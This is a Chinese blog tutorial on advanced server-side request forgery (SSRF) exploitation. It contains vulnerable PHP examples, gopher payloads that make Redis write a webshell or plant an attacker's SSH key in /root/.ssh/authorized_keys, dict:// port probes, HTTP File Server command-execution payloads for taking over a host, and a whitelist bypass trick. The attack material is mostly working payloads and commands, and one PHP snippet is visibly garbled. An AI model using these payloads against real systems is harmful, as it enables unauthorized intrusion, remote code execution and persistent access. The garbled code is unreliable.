SSRF深入各种高级实战用法

已于 2022-12-11 11:55:33 修改
阅读量1k 收藏 5
点赞数
文章标签: web安全 网络安全
于 2022-12-11 11:50:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G0mini/article/details/128273166
版权

简介

什么是SSRF?服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统

0x0 前期准备

1.phpstudy

1.SSRF常见的攻击手法

漏洞产生SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地址做过滤和限制,如PHP中的curl_exec、file_get_contents、fsockopen

1.1 curl_exec

<?php
function curl($url){
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_exec($ch);
    curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>

1.2 file_get_contents

<?php
if(isset($_GET('file'])&&$_GET('file'] !=nulL) {
  $filename = $GET('file']:
  $str = file_get_contents ($filename);
  echo Sstr:
}
?>

1.3 fsockopen

<?php
function Getfile($host, $port, $link){
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if(!$fp){
        echo "$errstr (error number $errno) \n";
    }else{
        $out = "GET $link HTTP/1.1\r\n";
        $out .= "HOST $host \r\n";
        $out .= "Connection: Close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $content = '';
        while(!feof($fp)){
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
查看curl的版本和该版本支持的协议

在这里插入图片描述

1.判断SSRF

一般SSRF存在于通过Interface去请求,外部链接资源,或者内部连接资源,如api开放平台的某处调用
在这里插入图片描述

一般来说,我们可以通过提交URL地址去探测此接口是否存在ssrf,探测一般分为两种,一种是无回显型一种是回显型,有回显的就比较明显,会将获取到的数据直接返回,无回显可以通过响应时间,还有DNSlog去探测。

在这里插入图片描述

在这里插入图片描述

2.SSRF与协议

一、gopher

互联网上使用的分布型的文件搜集获取网络协议,是一种分布式文档传递服务,也叫万金油协议,可以拿此协议作为POST、GET请求去发包,也可以去攻击redis、ftp、telnet、mysql等

gopher利用对应版本

php >=5.3
java <=jdk1.7

gopher协议格式:

gopher://ip:port/_payload
gopher://IP:port/_后接TCP数据流
使用gopher协议进行发包时,回车换行需要使用%0d%0a(/r/n)替换,并且url编码
tcpdump抓取redis通信数据包,监听eth0网卡上的6379端口

tcpdump -i eth0 port 6379 -w redis.pcap

在这里插入图片描述

正常连接redis,并尝试通讯

在这里插入图片描述

分析数据包,查看tcp流
在这里插入图片描述

通过数据包可以分析,每一行命令为一个数组,如set ceshi "123"为一个三个元素的数组,所以开头的标识符*为3,每个元素的长度都由$标识,现在就完全了解redis通讯数据包的格式了,我们直接使用gopher协议对redis进行交互

我们尝试通过redis通讯数据包格式去发送gopher协议请求

*3
$3
set
$5
ceshi
$3
1234
exit

URL编码:

%2a%33%0a%24%33%0a%73%65%74%0a%24%35%0a%63%65%73%68%69%0a%24%33%0a%31%32%33%34%0a%65%78%69%74
​

在这里插入图片描述

需要替换换行符%0a为%0d%0a,单个%0a,http协议无法去识别为回车换行,在协议中对于回车换行,只能用通过%0d%0a来识别,%0d%0a的也就是\r\n回车符和换行符
在这里插入图片描述


收到请求结果,最终payload为:

gopher://192.168.124.18:6379/_%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%35%0d%0a%63%65%73%68%69%0d%0a%24%33%0d%0a%31%32%33%34%0d%0a%65%78%69%74%0d%0a

在这里插入图片描述

2.在存在web的情况下写webshell

config set dir /var/www/html/
config set dbfilename ceshi.txt
set shell "ceshi123456"
save

tcp数据流

*4
$6
config
$3
set
$3
dir
$14
/var/www/html/
*4
$6
config
$3
set
$11
dbfilename
$9
ceshi.txt
*3
$3
set
$5
shell
$6
123456
save

如果是linux,同时也可以通过写入ssh公钥进行登录

set  margin  "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDr6sOA325MhcQUUknax18ZY9+I/t8LUzPqaD1eX/covADk/nbqcdohGhziCqNIicwdsSoSGu94Y1sauZfocDIIxsfvacFERhmjOXuO2MwxwBRjhblaMUnf3z/pWHjGC03olnkC7JzCIxydkoWRjuEZSbjYSvFvW70P0phyjQ6uYeBXZ32WWEB3iBDW7RGUI/UqmTYr5dWVnzbPsebNqVlCbfvBCGAGC3BmmZs2xoD8gFltru4BraBhMc3a5KCJrpuHVkC+5HxrzpTkFUIxIF2MgdC4XEtFgJUPyXE9kL94/Y/xgVtxFzeyYURPyN0Ps LSgyJopIkSTQh/+/u+46MlXWZb+8LjdafSy9vglbiCir7u9rQGB8eqo8iBzfSZpDmJi0GqFJioWs5yF0guw06OEoC52cf8q2568zsdp8B4VBW1cSTPTaAdv9aEbn6qANLjigSIFMApW3eU5jEECawXts9Z7v9CfKd2Z3rHuIV4pl85emdv51fXyPiV1wf0m2zs= root@kali\n\n\n"
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save

当然我们也可以用工具去编码数据流,一个一个去数数组还有元素效率确实不高
比如:https://github.com/firebroo/sec_tools/blob/master/redis-over-gopher/redis-over-gopher.py

gopher post请求

发送post请求可以直接去burp里抓包,然后编码,再通过gopher协议去请求,通过burp抓到的包就是原始的http数据流,不需要像redis一样去数数组元素
在这里插入图片描述

gopher协议下的post请求必须要包含四个字段 POST、Host、Content-Type、Content-Length

POST / HTTP/1.1
Host: 192.168.124.9:8013
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

a=1

在这里插入图片描述
在这里插入图片描述

二、dict

1.什么是dict?

dict 协议可以加载一个 tcp 端口的提供的服务所返回的部分数据,在ssrf中通常用于作为端口探测,类似于telnet 协议。也可以通过dict去查看curl的版本信息,直接通过nc监听,访问
dict协议格式:
dict://127.0.0.1:port/payload
比如向未授权的redis发起请求http://192.168.2.169:8012/ssrf.php?url=dict://172.16.122.5:6379/info,可以看到redis的基本配置信息

三、file

file协议格式:
file://file

四、http/s

http/s协议格式:
http://
https://
通常也作为端口探测,效果类似于dict,也是会返回服务的部分数据

0x2 进阶之SSRF

前言:某次hw遇到的突发奇想,通过外网找到一个SSRF触发点,通过http协议去去扫描存在的web,找到一个hfs,通过ssrf+配合hfs成功上线

1.SSRF+HTTP File Server

漏洞版本:HTTP File Server 2.3c及之前版本
Payload:
?search==%00{.exec|cmd /c command.}
?search==%00{.exec|command.}
可以通过hfs去添加用户或者执行上线命令

在这里插入图片描述

正常访问通过ssrf访问到hfs

在这里插入图片描述

ssrf+powershell上线

在这里插入图片描述

当然在实测中肯定需要绕过杀软的方式,这个就要自己去研究了

0x3 SSRF绕过

1.白名单绕过
只允许访问指定domain或者指定ip时,可以通过http认证来绕过
如果ssrf只允许访问百度:http://127.0.0.1/ssrf.php?url=https://www.baidu.com
我们的目标是绕过百度访问到搜狗
我们只需要通过http认证的格式去绕过:
http://127.0.0.1/ssrf.php?url=https://www.baidu.com@www.sogou.com
实现效果如下:

搭建一个伪造的http认证
在这里插入图片描述

在ssrf触发点,通过http认证的格式去访问
在这里插入图片描述

抓取取到认证信息

在这里插入图片描述

同理绕过百度,访问到搜狗

在这里插入图片描述

G0mini
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[红日安全]Web安全Day4 - SSRF实战攻防
hongrisec的博客
02-24 342
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
SSRF漏洞,绕过,实战化演示
m_de_g的博客
08-13 953
SSRF 漏洞 1.介绍ssrf漏洞 SSRF(Server-Side Request Forgery,服务度器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。 2.SSRF漏洞原理 SSRF的形成大多是由于服务端提供了从其他服务器应用数据的功能且没有对目标地址做过过滤与限制。例如,黑客操作服务器端从URL地址获取网页文本内容,加载指定地址的图片等,利用的
实战篇丨聊一聊SSRF漏洞的挖掘思路与技巧
dfdhxb995397的博客
05-24 528
在刚结束的互联网安全城市巡回赛中,R师傅凭借丰富的挖洞经验,实现了8家SRC大满贯,获得了第一名的好成绩!R师傅结合自身经验并期许新手小白要多了解各种安全漏洞,并应用到实际操作中,从而丰富自己的挖洞经验,积累挖洞技巧。(文末有R师傅的个人专访,挖洞秘籍尽在其中) 今天i春秋就针对众多安全漏洞中的SSRF进行详细介绍,理论内容结合实际案例进行深度分析,帮助大家快速get新技能!本文阅读用...
ssrf深度剖析
Bul1et的博客
12-17 310
一般找到这个漏洞我们直接构造个链接让他直接访问百度就行了     当然我们也可以在对方服务器的内网漫游一下,比如看看他内网某个ip的22端口ssh的banner 也可以构造链接去读他的源码 放到base64解码就ok了                ...
实战 | SSRF攻击内网的实战案例
weixin_43167326的博客
02-03 855
推荐查看: 实战 | 记一次SSRF攻击内网的实战案例 实战 | 记两次应急响应小记 干货 | Wordpress网站渗透方法指南 实战 | 记一次CTF题引发的0day挖掘 2023年零基础+进阶系统化白帽黑客学习 实战 | 记一次邮件系统C段引发的SQL手注和内网渗透
SSRF 漏洞学习实战
qq_63087425的博客
06-13 1389
ssrf(Server-Side request Forgery):服务器端请求伪造。服务端允许从其他服务器上下载图片,读取图片,读取文件,却不对请求的目标url进行过滤和限制。攻击者利用这一特性,以web应用作为代理攻击远程或者本地服务器,。一般来说,ssrf攻击的目标通常都是外网访问不到的内部系统对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。攻击运行在内网或本地的应用程序(通过构造payload)。对内网Web应用进行指纹识别,识别企业内部的资产信息。攻击内外网的Web应用,
红蓝对抗中的SSRF深入利用实战.pdf
08-11
安全趋势 概述 SSRF简介 利用现状 利用困境 实战分享 Case 1 Case 2 Case 3
SSRF:针对关键业务应用的新威胁.pdf
08-07
企业应用程序 定义 典型企业环境 企业威胁和防御 SSRF 发展历程 类型 XXE隧道 使用SSRF攻击SAP 旧攻击的新活力 绕过安全限制 利用其他服务 结论
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF漏洞】实战演示 超详细讲解
qinshuoyang1的博客
08-09 1601
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞。
SSRF漏洞-01】服务端请求伪造靶场实战
cc
02-20 3784
服务端请求伪造)是一种由攻击者构造请求,由服务器端发起请求的安全漏洞,本质上是属于信息泄露漏洞。如果“请求伪造”发生在服务器端,那么这个漏洞就叫做“服务器端请求伪造”即SSRF。SSRF是一种攻击者发起的伪造由服务器端发起请求的一种攻击,也是常见的web安全漏洞(缺陷或者风险)之一。互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片、文件资源(下载或读取)。例如:百度提供识图功能。用户可以从本地或者URL。
分享SSRF漏洞的学习和利用
HBohan的博客
07-09 385
前言 本文主要记录一次我们在复盘嘶吼网站渗透报告时遇到的一个SSRF漏洞。此漏洞并结合腾讯云的API接口,可以获取大量嘶吼服务器的敏感信息。利用这些敏感信息,又可以进行更为深入的渗透。 这篇文章将会发表在嘶吼网站上,渗透测试也是经过了嘶吼的官方授权,各位读者可以放心食用。这里由衷感谢漏洞的提交者。本篇中提到的漏洞已于2019年修复完毕,大家就不要再尝试了,此外,温馨提示:未授权的渗透行为是非法的。 漏洞介绍 SSRF(Server-Side Request Forgery, 服务器端请求伪造) 是一种由攻.
了解SSRF,这一篇就足够了
lionzl的专栏
09-06 2041
了解SSRF,这一篇就足够了 z3r0yu/2018-03-07 15:09:00/浏览数 8640新手入门资料顶(3)踩(0) 0x00 定义与成因 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发...
SSRF漏洞利用框架
cnbird's blog
09-16 2828
https://github.com/jayeshchauhan/SKANDA
网络安全行为可控定义以及表现内容简述
行云管家
05-28 248
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表现内容。
信息安全法规和标准
m0_62207482的博客
05-28 763
自行建设韵味的政府网站不放在境外;39、据《计算机场地安全要求(GB/T9361-2011)》,计算机机房的安全等级分为 A:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求,有完善的计算机器机房安全措施 B级:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求,有较完善的计算机机房安全措施 C级: 不属于A、B级的情况,对计算机机房的安全有基本的要求,有基本的计算机机房安全措施。
【Python安全攻防】【网络安全】一、常见被动信息搜集手段
最新发布
weixin_43031313的博客
05-28 636
执行上述命令后,导入会报错(找不到Whois模块)(在PyCharm中,IDLE则未出现此问题),需要在报错处再次执行安装命令。《Python安全攻防——渗透测试实战指南》,MS08067安全实验室 编著,北京,机械工业出版社,2021年10月第1版。:用来查询域名是否已经被注册,以及注册域名的详细信息。参数host为目标的URL,返回对应的ip地址。:通过目标URL查询目标的IP地址。
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. 访问 Redis 未授权的端口:Redis 默认监听在 6379 端口,如果你能够通过 SSRF 访问到该端口,并且 Redis 没有进行适当的身份验证和授权配置,那么你可能能够执行一些恶意操作,如读取或修改 Redis 中的数据。 2. 利用 Redis 的特殊功能:Redis 提供了一些特殊功能和命令,如远程代码执行、文件系统访问等。如果你能够通过 SSRF 发起有效的 Redis 命令,可能会导致服务器执行恶意操作。 需要注意的是,SSRF 攻击是一项严重的安全问题,可以导致数据泄漏、远程代码执行等风险。为了保护系统安全,建议在开发和部署过程中采取适当的安全措施,如限制服务器对内部资源的访问、使用防火墙、进行身份验证和授权等。同时,定期更新和修补软件漏洞也是很重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值